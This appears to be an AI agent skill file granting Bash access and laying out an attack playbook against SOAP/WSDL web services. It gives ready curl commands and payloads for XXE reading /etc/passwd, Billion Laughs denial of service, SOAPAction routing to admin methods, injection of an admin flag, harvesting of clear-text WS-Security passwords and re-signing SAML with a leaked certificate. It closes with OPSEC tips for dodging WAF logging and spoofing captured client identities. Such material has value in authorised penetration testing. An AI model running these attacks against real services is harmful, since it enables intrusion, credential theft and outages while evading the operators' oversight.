| name | api-soap-wsdl |
| description | SOAP / WSDL exploitation — WSDL enumeration via ?wsdl, XXE in SOAP envelope, WS-Addressing replay, WS-Security UsernameToken brute, SAML token injection in WS-Trust, schema validation bypass. |
| allowed-tools | Bash Read Write |
| metadata | {"when_to_use":"soap wsdl xml ws-security ws-addressing ws-trust saml asmx wcf .asmx .svc spring-ws","subdomain":"api","tags":"soap, wsdl, xml, ws-security","mitre_attack":"T1190, T1203"} |
SOAP / WSDL Attack Surface
Legacy enterprise integrations still ship SOAP — payment processors, ERP middleware, government APIs, Java EE bus systems.
Discovery
curl -sk "https://target/Service.asmx?wsdl" | xmllint --format -
curl -sk "https://target/Service.svc?wsdl" | xmllint --format -
python -m zeep https://target/Service.asmx?wsdl
wsdl2java -uri https://target/Service.asmx?wsdl
Quick attack catalog
XXE in SOAP envelope
curl -sk -X POST -H "Content-Type: text/xml" -H 'SOAPAction: ""' \
-d '<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body><tns:Method><tns:arg>&x;</tns:arg></tns:Method></soap:Body>
</soap:Envelope>' https://target/Service.asmx
WS-Security UsernameToken brute / clear-text leak
The <wsse:UsernameToken> often carries <wsse:Password> in clear text. If the channel is HTTP (not HTTPS) or the proxy logs payload, harvest creds:
curl -sk -X POST -d @ws-attack.xml https://target/svc
WS-Addressing replay
SOAP responses often include <wsa:RelatesTo> referencing the request <wsa:MessageID>. Some servers don't validate freshness:
<wsa:MessageID>uuid:CAPTURED_FROM_LEGITIMATE_REQUEST</wsa:MessageID>
SAML in WS-Trust / SAML EncryptedAssertion
WS-Trust 1.3 RST/RSTR flows accept SAML tokens. Re-sign the assertion with the IdP's leaked cert OR exploit XML Signature Wrapping (XSW) — see the SAML skill for full XSW patterns.
Schema validation bypass
Many servers parse the SOAP envelope before validating against the XSD. Inject XML that's malformed-for-schema but valid-for-parser:
<soap:Body>
<tns:Method>
<tns:adminFlag>true</tns:adminFlag>
<tns:arg>value</tns:arg>
</tns:Method>
</soap:Body>
XML Bomb / Billion Laughs DoS
<!DOCTYPE x [<!ENTITY a "12345678"><!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;"><!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">]>
<x>&c;&c;&c;</x>
SOAPAction routing confusion
.NET ASMX picks the method by SOAPAction header, not body. Mismatch → call methods you shouldn't be able to:
curl -X POST -H 'SOAPAction: "http://target/AdminMethod"' \
-d '<soap:Envelope>...PublicMethod body...</soap:Envelope>' \
https://target/Service.asmx
Tooling
soapui --gui
python3 -c "from zeep import Client; c = Client('https://target/Service.asmx?wsdl'); print(c.service.Method('arg'))"
OPSEC
- WS-Addressing
<wsa:MessageID> is logged in many WAFs — randomize per-request.
- WS-Security headers reveal client identity; spoof realistic clientIDs from previously-captured requests.
- SOAP fault messages leak stack traces — note them, but limit to one trigger per scan to avoid rate-limit alerts.
References
- WS-Attacks.org — XSW, XXE, WS-Security variants catalog
- OWASP "Testing for Web Services" — chapter on SOAP/WSDL
- "Hacking SOAP" — Pauldotcom episode (older but still 100% applicable)
- Burp extension: SAML Raider